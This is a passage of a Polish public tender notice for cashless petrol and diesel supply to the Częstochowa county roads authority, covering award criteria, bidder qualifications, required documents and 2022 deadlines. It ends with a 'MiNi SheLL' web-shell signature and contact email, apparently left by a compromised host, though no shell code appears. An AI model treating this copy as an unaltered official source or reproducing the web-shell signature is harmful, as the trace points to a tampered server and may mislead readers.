jak również zasady wiedzy technicznej wymagane do wykonania zadania. Uwzględnią także wszystkie elementy, które mają wpływ na koszty związane z eksploatacją oraz utylizacją przedmiotu zamówienia. Dokumenty opisujące przedmiot zamówienia są tak precyzyjne, że bez względu na fakt, kto będzie wykonawcą przedmiotu zamówienia jedyną różnicą będą zaoferowane ceny (tzn. przedmiot zamówienia jest zestandaryzowany - identyczny, niezależnie od tego, który z wykonawców go wykona). W związku z powyższym Zamawiający jest upoważniony do zastosowania ceny, jako jedynego kryterium wyboru oferty najkorzystniejszej lub ceny, jako jednego z kryteriów wyboru oferty o znaczeniu ponad 60%.”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość stacji od siedziby ODM</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 3<br/>Sukcesywna dostawa w formie bezgotówkowej paliw ciekłych: benzyny bezołowiowej 95 w ilości ok. 4.000 l (ok. 2.000 l na rok) i oleju napędowego w ilości ok. 4.000 l (w ilości 2.000 l na rok) dla Powiatowego Zarządu Dróg w Częstochowie w okresie od podpisania umowy przez 24 miesiące.<br/>Dostarczony przedmiot zamówienia musi być wysokiej jakości.<br/>Zamawiający przez okres obowiązywania umowy zastrzega sobie prawo do dwukrotnego przebadania pobranych próbek każdego rodzaju paliwa w niezależnym, akredytowanym laboratorium na koszt Oferenta. W przypadku potwierdzenia przeprowadzonymi badaniami braku odstępstw w jakości paliwa od obowiązujących norm, koszty badań ponosi Zamawiający.<br/>tacja benzynowa musi być zlokalizowana w obrębie max 10 km od siedziby poszczególnych obwodów drogowych :<br/>-	siedziba PZD Częstochowa – Częstochowa, ul. Sobieskiego 9 (budynek Starostwa Powiatowego w Częstochowie), 42-217 Częstochowa.<br/>Dostawy będą realizowane na zasadzie doraźnych, bezgotówkowych tankowań pojazdów do zbiornika i kanistrów w sposób ciągły. <br/>Z tytułu każdorazowego zakupu paliwa Wykonawca otrzymywać będzie należność ustaloną na podstawie aktualnej w dniu zakupu (tankowania) ceny brutto jednego litra paliwa z uwzględnieniem udzielonego przez Wykonawcę upustu oraz ilości zakupionego (zatankowanego) przez Zamawiającego paliwa. <br/>Dostarczane paliwa muszą spełniać normy określone w Rozporządzeniu Ministra Gospodarki z dnia 9 października 2015r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. z 2015 r., poz. 1680) oraz aktualne normy: PN-EN 228+A1 (dla benzyny bezołowiowej 95) i PN-EN 590+A1 (dla oleju napędowego). Wykonawca na każde żądanie Zamawiającego zobowiązany jest okazać stosowne „orzeczenie jakości paliwa”, w którym zawarte będą wyniki laboratoryjne badania dostarczonego paliwa, dotyczące zgodności paliwa z RMG z dnia 09.10.2015 r. dla paliw ciekłych. Wykonawca udziela min. 12 m-cy gwarancji na dostarczone paliwo, a w przypadku wykrycia uszkodzeń spowodowanych jego złą jakością, potwierdzonych ekspertyzą rzeczoznawcy, poniesie koszty napraw i ekspertyzy. W okresie zimowym Wykonawca zapewni Zamawiającemu paliwa przystosowane do niskich temperatur.<br/>W przypadku zmiany obowiązujących norm jakościowych w trakcie trwania umowy, Wykonawca będzie zobowiązany dostosować jakość paliw do nowych norm.<br/>Ilość zakupionego paliwa będzie uzależniona od potrzeb Zamawiającego.<br/>Zamawiający dopuszcza możliwość zakupu mniejszej ilości paliw niż podanych w pkt 1, bez możliwości roszczeń finansowych ze strony Wykonawcy.<br/>Dostawy będą wykonywane zgodnie z obowiązującymi przepisami, normami oraz na ustalonych niniejszą swz i umową warunkach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">09134100-8 - Olej napędowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) kryterium oceny ofert jest: <br/>- cena ofertowa (z uwzględnieniem stałego upustu) waga 90 %. (Kc)<br/>- Odległość stacji od siedziby ODM waga 10 %(Kkm)<br/>2)	sposób oceny<br/>a) Wzór do obliczenia punktowego w kryterium CENA <br/> a) Cena = Cena najniższa oferowana z uwzględnieniem stałego upustu (brutto)/ Cena badanej oferty z uwzględnieniem stałego upustu (brutto)x 100 punktów x 90 %<br/>b)	Zasady obliczenia punktowego w kryterium ODLEGŁOŚĆ STACJI OD SIEDZIBY ODM podany w liczbie kilometrów, którą Wykonawcy określą w formularzu ofertowym (zał. 1 do SIWZ). Punkty będą przyznawane w następujący sposób:<br/>-	0-2km - otrzymają 10,0 % - 10,00 pkt<br/>-	2-4km - otrzymają 7,5% - 7,5 pkt<br/>-	4-6km - otrzymają 5,0% - 5,0 pkt<br/>-	6-8km - otrzymają 2,5% - 2,5 pkt<br/>-	8-10km - otrzymają 0,0% - 0,0 pkt<br/><br/>Łączna ilość punktów uzyskanych przez ofertę zostanie obliczona według poniższego wzoru:<br/><br/>K = (Kc) + (Kkm) gdzie:<br/><br/>K – łączna ilość punktów uzyskana przez ofertę<br/>Kc – punkty uzyskane w kryterium CENA<br/>Kkm – punkty uzyskane w kryterium ODLEGŁOŚĆ STACJI OD SIEDZIBY ODM<br/><br/> UWAGA: W przypadku, jeżeli wykonawca nie poda w Formularzu OFERTA odległości stacji od siedziby ODM, zamawiający uzna, że wykonawca oferuje odległość przekraczającą wymaganą w powyższych zapisach i nie przyzna punktów za to kryterium oceny ofert.<br/>„Wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia, o których mowa w art. 246 ust. 2 Pzp z 11.09.2019r: zostały określone w opisie przedmiotu zamówienia, ust. 4 pkt. 4.4 i 4.5. Dokumenty te wskazują parametry wszystkich materiałów i urządzeń, które będą musiały być użyte do realizacji przedmiotu zamówienia jak również zasady wiedzy technicznej wymagane do wykonania zadania. Uwzględnią także wszystkie elementy, które mają wpływ na koszty związane z eksploatacją oraz utylizacją przedmiotu zamówienia. Dokumenty opisujące przedmiot zamówienia są tak precyzyjne, że bez względu na fakt, kto będzie wykonawcą przedmiotu zamówienia jedyną różnicą będą zaoferowane ceny (tzn. przedmiot zamówienia jest zestandaryzowany - identyczny, niezależnie od tego, który z wykonawców go wykona). W związku z powyższym Zamawiający jest upoważniony do zastosowania ceny, jako jedynego kryterium wyboru oferty najkorzystniejszej lub ceny, jako jednego z kryteriów wyboru oferty o znaczeniu ponad 60%.”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość stacji od siedziby ODM</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Posiadanie doświadczenia niezbędnego do wykonania przedmiotu zamówienia, tj. udokumentowanie wykonania, tj. zakończenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jednej dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w niniejszym postępowaniu odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia (zał. Nr 5 do SWZ).<br/> Określenie „dostawę w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w niniejszym postępowaniu” oznacza: dostawy paliw przez okres min. 6 miesięcy w ramach jednej umowy.<br/>	W przypadku dostaw, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia dostaw (w przypadku dostaw rozliczanych wyłącznie w walutach innych niż PLN).<br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 117 ust. 3 Pzp w sytuacji, gdy powyższy warunek będzie spełniony przez jednego ze wspólników konsorcjum to ten wspólnik musi wykonać części dostaw paliw przez okres min. 6 miesięcy w ramach jednej umowy. <br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 118 ust. 2 Pzp w sytuacji, gdy powyższy warunek będzie spełniony nie przez wykonawcę lub wspólnika konsorcjum, a przez „ podmiot udostępniający zasoby wykonawcy (tzw. „podmiot trzeci”), to „podmiot” ten musi być podwykonawcą części dostaw paliw przez okres min. 6 miesięcy w ramach jednej umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający będzie wymagał złożenia niżej wymienionych podmiotowych<br/>środków dowodowych:<br/>Wykazu dostaw, zgodny ze wzorem zamieszczonym w załączniku nr 5 do SWZ, spełniających<br/>wymagania określone w punkcie 18.1 SWZ wykonanych nie wcześniej niż w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których<br/>dostawy te zostały wykonane, sporządzone przez podmiot, na rzecz którego dostawy zostały<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty.<br/>Jeżeli wykonawca powołuje sią na doświadczenie w realizacji dostaw, wykonywanych wspólnie z<br/>innymi wykonawcami, powyższy wykaz dotyczy tylko dostaw, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył.<br/>Wszystkie ww. podmiotowe środki dowodowe (wymienione w niniejszym punkcie nr 19 SWZ)<br/>wykonawcy będą musieli złożyć na każde żądanie Zamawiającego w terminie przez niego wskazanym<br/>i w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z 23.12.2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz zgodnie z Rozporządzeniem<br/>Prezesa Rozporządzenie Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie” (Dz.U.<br/>z 2020 r. poz. 2452).<br/>Wykazy dostaw będą musiały być sporządzone i podpisane przez ten podmiot, który spełnia dany<br/>warunek, czyli odpowiednio przez: wykonawcę lub wspólnika konsorcjum lub „podmiot trzeci”.<br/>Uwaga: wykonawca, który polega na zdolnościach innych podmiotów w celu spełnienia powyższych<br/>warunków musi wraz z ofertą złożyć zobowiązanie tych podmiotów, o którym mowa w punkcie 10.1.4)<br/>SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie może podlegać wykluczeniu z postępowania na podstawie żadnej z<br/>przesłanek, o których mowa w<br/>art. 108 ust. 1 Pzp: wykonawca, żaden ze wspólników konsorcjum (w przypadku składania oferty<br/>wspólnej) ani żaden podmiot, na którego zasoby powołuje się wykonawca w celu spełnienia warunków<br/>udziału w postępowaniu Nie może podlegać wykluczeniu z postępowania na podstawie żadnej z<br/>przesłanek, o których mowa w art. 108 ust. 1 Pzp: wykonawca, żaden ze wspólników konsorcjum (w<br/>przypadku składania oferty wspólnej) ani żaden podmiot, na którego zasoby powołuje się wykonawca<br/>w celu spełnienia warunków udziału w postępowaniu jeżeli udowodni Zamawiającemu, że spełnił<br/>łącznie następujące przesłanki:<br/>1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub<br/>swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne;<br/>2) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim<br/>nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując<br/>odpowiednio z właściwymi organami, w tym organami ścigania, lub zamawiającym;<br/>3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym<br/>przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe<br/>postępowanie Wykonawcy,<br/>b) zreorganizował personel,<br/>c) wdrożył system sprawozdawczości i kontroli,<br/>d) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych<br/>regulacji lub standardów,<br/>e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie<br/>przepisów, wewnętrznych regulacji lub standardów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dostarczane paliwa muszą spełniać normy określone w Rozporządzeniu Ministra Gospodarki z<br/>dnia 9 października 2015r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. z 2015 r.,<br/>poz. 1680) oraz aktualne normy: PN-EN 228+A1 (dla benzyny bezołowiowej 95) i PN-EN590+A1 (dla oleju napędowego). Wykonawca na każde żądanie Zamawiającego zobowiązany<br/>jest okazać stosowne „orzeczenie jakości paliwa”, w którym zawarte będą wyniki laboratoryjne<br/>badania dostarczonego paliwa, dotyczące zgodności paliwa z RMG z dnia 09.10.2015 r. dla<br/>paliw ciekłych. Wykonawca udziela min. 12 m-cy gwarancji na dostarczone paliwo, a w<br/>przypadku wykrycia uszkodzeń spowodowanych jego złą jakością, potwierdzonych ekspertyzą<br/>rzeczoznawcy, poniesie koszty napraw i ekspertyzy. W okresie zimowym Wykonawca zapewni<br/>Zamawiającemu paliwa przystosowane do niskich temperatur. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający będzie wymagał złożenia niżej wymienionych podmiotowych środków<br/>dowodowych:<br/>Wykazu dostaw, zgodny ze wzorem zamieszczonym w załączniku nr 5 do SWZ, spełniających<br/>wymagania określone w punkcie 18.1 SWZ wykonanych nie wcześniej niż w okresie ostatnich 3<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na<br/>rzecz których dostawy te zostały wykonane, sporządzone przez podmiot, na rzecz którego<br/>dostawy zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Jeżeli wykonawca powołuje sią na doświadczenie w realizacji dostaw, wykonywanych wspólnie<br/>z innymi wykonawcami, powyższy wykaz dotyczy tylko dostaw, w których wykonaniu<br/>wykonawca ten bezpośrednio uczestniczył.<br/>Wszystkie ww. podmiotowe środki dowodowe (wymienione w niniejszym punkcie nr 19 SWZ)<br/>wykonawcy będą musieli złożyć na każde żądanie Zamawiającego w terminie przez niego<br/>wskazanym i w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz<br/>zgodnie z Rozporządzeniem Prezesa Rozporządzenie Rady Ministrów z dnia 30.12.2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie” (Dz.U. z 2020 r. poz. 2452).<br/>Wykazy dostaw będą musiały być sporządzone i podpisane przez ten podmiot, który spełnia<br/>dany warunek, czyli odpowiednio przez: wykonawcę lub wspólnika konsorcjum lub „podmiot<br/>trzeci”.<br/>Uwaga: wykonawca, który polega na zdolnościach innych podmiotów w celu spełnienia<br/>powyższych warunków musi wraz z ofertą złożyć zobowiązanie tych podmiotów, o którym mowa<br/>w punkcie 10.1.4) SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) wypełniony FORMULARZ OFERTOWY, stanowiący załącznik nr 3 do SWZ. Do oferty należy<br/>dołączyć aktualne dokumenty potwierdzające status prawny wykonawcy, np. odpis z właściwego<br/>rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. Oferta nie musi<br/>zawierać tych dokumentów w przypadku wskazania przez wykonawcę, że są one dostępne w<br/>formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych<br/>baz danych. Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z ww.<br/>dokumentów. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z ww. dokumentów, to<br/>do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii<br/>potwierdzonej notarialnie.<br/>2) wpłata wadium - Zamawiający nie wymaga wniesienia wadium;<br/>3) pełnomocnictwo ustanowione do reprezentowania wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego;<br/>4) wykonawca, który w celu spełnienia warunków udziału w postępowaniu, o których mowa w<br/>punktach 18.1 lub 18.2 lub 18.3 SWZ będzie polegał na zdolnościach podmiotów<br/>udostępniających zasoby to zgodnie z art. 118 ust. 3 Pzp musi złożyć wraz z ofertą zobowiązanie podmiotów udostępniających zasoby do oddania mu do dyspozycji te zasoby na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zgodnie z art. 118 ust. 4 Pzp: Zobowiązanie podmiotu udostępniającego zasoby musi<br/>potwierdzać, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby<br/>gwarantuje rzeczywisty dostęp do tych zasobów oraz musi określać w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>5) wypełniony załącznik nr 4 do SWZ, stanowiący oświadczenia odpowiednio: wykonawcy;<br/>każdego ze wspólników konsorcjum (w przypadku składania oferty wspólnej); podmiotów, na<br/>zasoby, których powołuje się wykonawca w celu spełnienia warunków udziału w postępowaniu<br/>dotyczące spełniania warunków udziału w postępowaniu, o których mowa w punktach 18.1, 18.2<br/>i 18.3 SWZ oraz przesłanek wykluczenia z postępowania, o których mowa w art. 108 ust. 1 Pzp<br/>(punkt 12 SWZ) oraz art. 109 ust. 1 Pzp punkty 5, 6, 7, 8, 9 i 10 (punkt 17 SWZ);<br/>Uwaga: wypełniony Fromularz wraz z dokumentami potwierdzającymi, że zaproponowane przez<br/>wykonawcę „równoważniki” posiadają wymagane parametry stanowi przedmiotowy środek<br/>dowodowy, o którym mowa w art. 106 Pzp. Zgodnie z art. 107 ust. 1 Pzp „Wykaz” musi być<br/>złożony wraz z ofertą. Jeżeli wykonawca nie złoży go wraz z ofertą, oferta będzie podlegała<br/>odrzuceniu na podstawie art. 226 ust. 1 pkt 5 Pzp jako niezgodna z warunkami zamówienia.<br/>Jeżeli „Wykaz” będzie niekompletny Zamawiający wezwie danego wykonawcę do jego<br/>uzupełnienia w wyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót, wykonywanych wspólnie z<br/>innymi wykonawcami, powyższy wykaz dotyczy tylko robót, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył.<br/>Wszystkie ww. podmiotowe środki dowodowe (wymienione w niniejszym punkcie nr 19 SWZ)<br/>wykonawcy będą musieli złożyć na każde żądanie Zamawiającego w terminie przez niego<br/>wskazanym i w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz<br/>zgodnie z Rozporządzeniem Prezesa Rozporządzenie Rady Ministrów z dnia 30.12.2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie” (Dz.U. z 2020 r. poz. 2452).<br/>Wykazy robót budowlanych będą musiały być sporządzone i podpisane przez ten podmiot, który<br/>spełnia dany warunek, czyli odpowiednio przez: wykonawcę lub wspólnika konsorcjum lub<br/>„podmiot trzeci”.<br/>Uwaga: wykonawca, który polega na zdolnościach innych podmiotów w celu spełnienia powyższych warunków musi wraz z ofertą złożyć zobowiązanie tych podmiotów, o którym mowa<br/>w punkcie 10.1.4) SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane w formie aneksu<br/>podpisanego przez obie strony, pod rygorem nieważności w przypadkach określonych w SWZ.<br/>Zamawiający zgodnie z art. 455 ust. 1 pkt. 1 ustawy Prawo zamówień publicznych przewiduje<br/>możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie<br/>opisanym w § 9 projektu umowy stanowiącej załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzd-czestochowa.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-28 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com